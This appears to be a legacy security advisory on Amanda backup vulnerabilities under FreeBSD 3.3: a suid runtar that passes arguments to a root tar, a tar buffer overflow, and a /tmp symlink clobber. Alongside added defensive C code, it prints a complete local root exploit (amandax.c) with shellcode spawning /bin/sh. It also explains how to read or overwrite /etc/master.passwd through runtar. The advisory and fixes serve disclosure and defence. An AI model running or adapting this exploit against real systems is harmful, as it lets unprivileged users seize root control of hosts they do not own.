COMMAND

    Amanda

SYSTEMS AFFECTED

    multiple platforms... (FreeBSD, BSDi, etc)

PROBLEM

    Brock Tellier found the following.  The Amanda backup package has
    several vulnerabilities which allow any local user to gain root
    privileges.  Brock's tests were done ONLY on FreeBSD 3.3-RELEASE,
    though this is almost certainly not the only vulnerable OS.  A
    search for "amanda-2 and not freebsd" on AltaVista yields
    preliminary, unconfirmed data that some of the vulnerable OSes
    (based on packages included on install CDs; anyone can install
    Amanda and make themselves vulnerable) may be: RedHat ?.?,
    TurboLinux, PowerTools CD, SuSE 6.2.  Confirmation of which
    OSes/tars are vulnerable would be useful.

    Amanda's "runtar" program,  suid root by  default on FreeBSD  3.3,
    calls /usr/bin/tar  and passes  all args  given to  runtar to this
    program. Tar is thus run  with root permissions and is  vulnerable
    to all of the same attacks on suid programs that it would have  if
    it were suid itself.

    Vuln #1 - run tar as root
    =========================
    Since tar is run with root permissions, you are free to tar up any
    file you wish, including  /etc/master.passwd.  You may  also untar
    any  file  you  wish,  to  any  location  on the system, including
    /etc/master.passwd.   This does  not require  any exploit  kung-fu
    and may be  done by supplying  args to tar/runtar  as if you  were
    root.

    Vuln #1.1 - tar contains a buffer overflow
    ==========================================
    Obtaining root via buffer  overflow here is redundant,  of course,
    but  it  illustrates  the  point  that  even if tar's capabilities
    weren't able to gain root  privs, the buffer overflow would  still
    allow you to do so.  An overflow exists *IN TAR* which will  allow
    any user to execute  commands as root.   Note that an overflow  in
    tar isn't an immediate security flaw since it is never  suid/sgid,
    but it goes to show that one should do security audits of all  the
    programs one calls with user input.   By passing a long string  to
    runtar in the form

        /usr/local/libexec/amanda/runtar cvf $400bytes:bah

    we can execute our commands.  FreeBSD exploit attached below.
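    Vuln #1 and #1.1 share one design flaw: a setuid wrapper that hands
    whatever arguments it receives to a privileged tar.  The following is
    an added example, not Amanda's runtar, of the argument screening such
    a wrapper needs; the permitted option set, the 255-byte length cap and
    /usr/bin/tar as the exec target are assumptions for illustration.

```c
/* Argument screening for a setuid wrapper that runs tar as root.
 * Added example, not Amanda's runtar; the policy below is an assumption. */
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define TAR_PATH    "/usr/bin/tar"  /* the tar the page says runtar calls */
#define MAX_ARG_LEN 255             /* assumed cap; the page's overflow needs ~400 bytes */

/* Returns NULL when argv (argv[0] = wrapper name) is an acceptable
 * "create archive to stdout" invocation, otherwise a short reason to log. */
const char *screen_tar_args(int argc, char *const argv[])
{
    int i, archive_seen = 0;
    if (argc < 4) return "too few arguments";
    for (i = 1; i < argc; i++) {
        size_t n = strlen(argv[i]);
        if (n == 0 || n > MAX_ARG_LEN) return "argument length out of range";
    }
    /* Creation only: "x"/"--extract" would let the caller drop files
     * anywhere on the system as root (Vuln #1). */
    if (strcmp(argv[1], "--create") != 0) return "only --create is permitted";
    for (i = 2; i < argc; i++) {
        if (strcmp(argv[i], "--file") == 0 || strcmp(argv[i], "-f") == 0) {
            /* The archive must go to stdout: a path here lets root
             * overwrite any file the caller names. */
            if (i + 1 >= argc || strcmp(argv[i + 1], "-") != 0)
                return "archive must be written to stdout";
            archive_seen = 1;
            i++;
        } else if (argv[i][0] == '-') {
            return "unexpected option";  /* extend deliberately, one option at a time */
        }                                /* anything else is a path tar only reads */
    }
    return archive_seen ? NULL : "missing --file -";
}

int main(int argc, char *argv[])
{
    const char *why = screen_tar_args(argc, argv);
    if (why) {
        fprintf(stderr, "runtar: refused: %s\n", why);
        return 1;
    }
    execv(TAR_PATH, argv);   /* only reached with a screened argv */
    perror("execv");
    return 1;
}
```

    Screening argv is only half the fix; the wrapper should also verify
    that the real uid is the backup account before exec'ing anything.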

    Vuln #2 - symlink problem
    ==========================
    Not quite as serious, but a concern nonetheless.  When the amandad
    daemon is run, a bin-owned file called "amandad.debug" is created
    in /tmp.  By creating a symlink from /tmp/amandad.debug to any
    other file, we will force amandad to clobber the contents of that
    file with amandad's debug info.  Note that amandad is not
    suid/sgid, but it is often run with root perms at startup or via
    scripts.
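    The fix for a fixed-name debug file in a shared directory is to never
    create it through an existing path and never follow a symlink there.
    The following is an added example, not amandad's code: the open()
    pattern the page describes beside a hardened one, with a demonstration
    that runs entirely inside a scratch directory it creates itself (the
    directory name and file contents are constructed for the demo).

```c
#define _GNU_SOURCE          /* mkdtemp, O_NOFOLLOW on glibc */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* The pattern the page describes: a fixed name in a shared directory,
 * opened for writing with truncation.  open() follows a symlink planted
 * there and truncates its target with the daemon's privileges. */
int open_debug_log_unsafe(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
}

/* Hardened: create-only (O_EXCL fails on any existing path, a symlink
 * included) and never follow a symlink in the last component. */
int open_debug_log_safe(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Demonstration in a private scratch directory (constructed for the demo).
 * Returns 0 when the unsafe open emptied the victim through the symlink
 * and the safe open refused; any other value means the demo did not run. */
int symlink_clobber_demo(void)
{
    char dir[] = "/tmp/amandademoXXXXXX", victim[64], lnk[64], buf[16];
    int fd, rc = -1;
    ssize_t n;
    if (!mkdtemp(dir)) return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(lnk, sizeof lnk, "%s/amandad.debug", dir);
    /* a file with content, and the symlink an attacker would plant */
    fd = open(victim, O_WRONLY | O_CREAT, 0600);
    if (fd < 0 || write(fd, "secret\n", 7) != 7 || close(fd) != 0) goto out;
    if (symlink(victim, lnk) != 0) goto out;
    fd = open_debug_log_unsafe(lnk);           /* follows the link */
    if (fd >= 0) close(fd);
    fd = open(victim, O_RDONLY);
    n = fd >= 0 ? read(fd, buf, sizeof buf) : -1;
    if (fd >= 0) close(fd);
    if (n != 0) goto out;                      /* victim is now empty */
    fd = open_debug_log_safe(lnk);             /* must refuse */
    if (fd >= 0) { close(fd); goto out; }
    rc = (errno == EEXIST || errno == ELOOP) ? 0 : 1;
out:
    unlink(lnk); unlink(victim); rmdir(dir);
    return rc;
}
```

    The safer layout is a daemon-owned, mode 0700 directory for debug
    output rather than /tmp, with the create-only open on top of that.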

    Anyone running a suid version of runtar should be suspicious.
    Brock did not test any OS other than FreeBSD 3.3, which includes
    amanda 2.3.0 and 2.4.1 as "additional packages" on the install CD,
    and tar-1.11.2.

    Exploit:

    /*
     * Amanda runtar exploit yields euid=0(root)
     * Actually overflows tar 1.11.2 (included in FreeBSD 3.3)
     * Tested on FreeBSD 3.3, modify shell/addr/dir for Amanda/tar on other
     * platforms
     *
     * Compile gcc -o amandax amandax.c
     * Run ./amandax <offset> <buflen>
     * keep buflen around 400, try positive and negative offsets
     *
     * Brock Tellier btellier@usa.net
     */

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>   /* memset, memcpy, strlen */
    #include <unistd.h>   /* execl */

    char fbsdshell[]= /* mudge@lopht.com */
      "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
      "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
      "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
      "\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh";

    #define LEN 400
    #define NOP 0x90
    #define ALIGN 3
    #define OFFSET 0
    #define ADDR 0xbfbfdd90 /* fbsd 3.3 */

    int main(int argc, char *argv[]) {

      long int offset=OFFSET;
      int i;
      int buflen = LEN;
      long int addr = ADDR;
      char buf[LEN];

      if (argc > 1) offset = atoi(argv[1]);
      if (argc > 2) buflen = atoi(argv[2]);
      if (argc > 3) {
        fprintf(stderr, "Usage: %s <offset> <buflen>\n", argv[0]);
        exit(0);
      }

      fprintf(stderr, "Amanda runtar exploit for FreeBSD 3.3\n");
      fprintf(stderr, "Brock Tellier btellier@usa.net\n");
      fprintf(stderr, "Using addr: 0x%lx\t buflen: %d\t offset: %ld\n",
              addr+offset, buflen, offset);

      /* NOP sled, shellcode at offset 100, then the guessed return
       * address repeated to the end of the buffer */
      memset(buf,NOP,buflen);
      memcpy(buf+100,fbsdshell,strlen(fbsdshell));
      for (i = 100 + strlen(fbsdshell) + ALIGN; i < buflen-4; i += 4)
        *(int *)&buf[i] = addr+offset;

      execl("/usr/local/libexec/amanda/runtar", "runtar","cvf", buf, ":bah",
            NULL);

      exit(0);
    }

SOLUTION

    If your amanda is properly installed, then it runs as the user
    amanda, bin, or operator, none of which should be accessible to a
    regular user.  If that account is compromised, then security is
    irrelevant anyway, because amanda needs to be able to read the raw
    disk files (to do backups) and thus could get /etc/shadow (or the
    local equivalent) without much work.

    Amanda underwent a major security audit before release 2.4.0 final
    (the latest stable release is 2.4.1p1), in which a couple of
    security problems were fixed and a lot of security-problem-prone
    constructs were reworked to avoid buffer overflows and such.